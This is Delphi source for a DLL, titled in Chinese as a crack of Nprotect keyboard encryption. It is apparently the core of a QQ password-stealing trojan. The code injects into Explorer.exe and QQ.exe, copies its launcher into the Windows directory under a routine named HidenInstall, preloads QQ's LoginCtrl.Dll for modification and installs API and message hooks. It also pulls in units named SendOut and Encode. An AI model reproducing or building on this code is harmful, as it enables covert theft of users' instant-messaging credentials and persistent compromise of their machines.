divqq32.~dpr

破解“国际领先的Nprotect键盘加密技术”

library divqq32;

{ Important note about DLL memory management: ShareMem must be the
  first unit in your library's USES clause AND your project's (select
  Project-View Source) USES clause if your DLL exports any procedures or
  functions that pass strings as parameters or function results. This
  applies to all strings passed to and from your DLL--even those that
  are nested in records and classes. ShareMem is the interface unit to
  the BORLNDMM.DLL shared memory manager, which must be deployed along
  with your DLL. To avoid using BORLNDMM.DLL, pass string information
  using PChar or ShortString parameters. }

uses
  Windows,
  Messages,
  SysUtils,
  InsertHook in 'InsertHook.pas',
  CallSelf in 'CallSelf.pas',
  Common in 'Common.pas',
  Thread in 'Thread.pas',
  MsgHook in 'MsgHook.pas',
  FunUnit in 'FunUnit.pas',
  ReEntry in 'ReEntry.pas',
  VarUnit in 'VarUnit.pas',
  ApiHook3 in 'ApiHook3.pas',
  TempWindow in 'TempWindow.pas',
  RegSet in 'RegSet.pas',
  SendOut in 'SendOut.pas',
  Encode in 'Encode.pas',
  ShareData in 'ShareData.pas',
  QQThread in 'QQThread.pas';

{$R *.res}
exports
  InsertHookOn, InsertHookOff,GetShareData,
  MsgHookOn, MsgHookOff;
  
const
  sProcess    = 'Explorer.exe';  // 待插入进程名
  destPorcess = 'QQ.exe';   //目标进程名
type
    TMapDllData = record
      CurThreadID : DWORD;
      ExeFile : String[255];
    end;
    PMapDllData = ^TMapDllData;
      
var
  ModuleFileName: array [0..MAX_PATH] of Char;
  PMainDllData: PMapDllData;
  CallerExeFile : String;
  DestExePath : String;
  MutexHandle, FileHandle, SubThreadID: DWORD;

//串比较（不区分大小写）
function CompareAnsiText(const S1, S2: string): Boolean;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1), -1, PChar(S2), -1) = 2;
end;

//把文件拷进Windows目录
function HidenInstall(sourceFN : String) : String;
  function WindowsDirectory: string;
  var
    WinDir: array [0..MAX_PATH] of char;
  begin
    GetWindowsDirectory(WinDir, MAX_PATH);
    Result := WinDir;
    if Result[Length(Result)] <> '\' then
      Result := Result + '\';
  end;
var
  destFN : String;  
begin
  Result := sourceFN;
  destFN :=  WindowsDirectory + ExtractFileName(sourceFN);
  if CompareAnsiText(sourceFN,destFN) then Exit;
  if CopyFile(PChar(sourceFN),PChar(destFN),False) then
    Result := destFN;
end;

// DLL回调
{procedure DllMain(dwReason: DWord);
begin
  if (dwReason = DLL_PROCESS_DETACH) then ApiHookOff();
end;}

procedure DllEntryPoint(dwReason: DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH:;
    DLL_PROCESS_DETACH:
    begin
       if CurIsQQ then
         ApiHookOff();
       ShareData.CloseShareData;
    end;
    DLL_THREAD_ATTACH:;
    DLL_THREAD_DETACH:;
  end;
end;

begin
  //得到目前模块儿的名字
  GetModuleFileName(0, @ModuleFileName[0], MAX_PATH);
  if CompareAnsiText(ExtractFileName(ModuleFileName), sProcess) then
  begin
    //保证只创建一个线程
    MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, DllMutex);
    if (MutexHandle <> 0) then
    begin
      CloseHandle(MutexHandle);
    end  
    else begin
      CurIsExplorer := True;
      ShareData.CreateShareData;
      if ShareData.GetShareData <> nil then begin
        //创建 sProcess 的子线程
        CreateThread(nil, 0, @ThreadPro, nil, 0, SubThreadID);
        //增加自身引用计数
        GetModuleFileName(HInstance, @ModuleFileName[0], MAX_PATH);
        LoadLibrary(@ModuleFileName[0]);
        //通知Start.exe退出
        FileHandle := OpenFileMapping(FILE_MAP_ALL_ACCESS, False, sFileMap);
        PMainDllData := MapViewOfFile(FileHandle, FILE_MAP_ALL_ACCESS, 0, 0, SizeOf(TMapDllData));
        PostThreadMessage(PMainDllData^.CurThreadID, WM_QUIT, 0, 0);
        CallerExeFile := PMainDllData^.ExeFile;
        ShareData.GetShareData.CfgFileName := HidenInstall(CallerExeFile);
        //增加Start.exe的引用计数，防止被修改
        LoadLibrary(PChar(Trim(String(ShareData.GetShareData.CfgFileName))));
        UnmapViewOfFile(PMainDllData);
        CloseHandle(FileHandle);
      end;  
    end;
  end else if CompareAnsiText(ExtractFileName(ModuleFileName), destPorcess) then begin
      ShareData.OpenShareData;
      QQProcessID := GetCurrentProcessID();
      CreateThread(nil, 0, @QQThreadPro, nil, 0, SubThreadID);/////
      MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, DllMutex);
      if (MutexHandle <> 0) then
      begin
        CloseHandle(MutexHandle);
        //如果线程已经创建则认为是新线程发起的MsgHook
        CurIsQQ := True;
        DestExePath := ExtractFilePath(ModuleFileName);  // 当前路径
        LoadLibrary(PChar(DestExePath + 'LoginCtrl.Dll')); // 提前载入, 以便修改
        ApiHookOn();
      end;
  end;
  DllProc := @DllEntryPoint;
  DllEntryPoint(DLL_PROCESS_ATTACH);
end.